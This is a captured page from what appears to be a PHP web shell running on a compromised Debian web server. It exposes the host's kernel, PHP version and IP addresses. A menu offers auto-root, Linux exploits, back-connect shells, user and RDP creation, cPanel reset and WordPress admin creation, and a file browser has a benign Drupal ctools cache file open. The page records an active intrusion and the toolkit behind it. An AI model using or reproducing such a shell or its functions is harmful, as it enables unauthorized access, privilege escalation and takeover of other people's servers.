Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.133.109.141
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
ctools /
plugins /
cache /
[ HOME SHELL ]
Name
Size
Permission
Action
export_ui.inc
1.2
KB
-rw-r--r--
simple.inc
1.31
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : simple.inc
<?php /** * @file * A simple cache indirection mechanism that just uses the basic object cache. */ $plugin = array( // cache plugins are the rare plugin types that have no real UI but // we're providing a title just in case. 'title' => t('Simple'), 'cache get' => 'ctools_cache_simple_cache_get', 'cache set' => 'ctools_cache_simple_cache_set', 'cache clear' => 'ctools_cache_simple_cache_clear', ); function ctools_cache_simple_cache_get($data, $key) { ctools_include('object-cache'); // Ensure that if there is somehow no data, we at least don't stomp on other // people's caches. if (empty($data)) { $data = 'simple_cache_plugin'; } return ctools_object_cache_get($data, $key); } function ctools_cache_simple_cache_set($data, $key, $object) { ctools_include('object-cache'); // Ensure that if there is somehow no data, we at least don't stomp on other // people's caches. if (empty($data)) { $data = 'simple_cache_plugin'; } return ctools_object_cache_set($data, $key, $object); } function ctools_cache_simple_cache_clear($data, $key) { ctools_include('object-cache'); // Ensure that if there is somehow no data, we at least don't stomp on other // people's caches. if (empty($data)) { $data = 'simple_cache_plugin'; } return ctools_object_cache_clear($data, $key); }
Close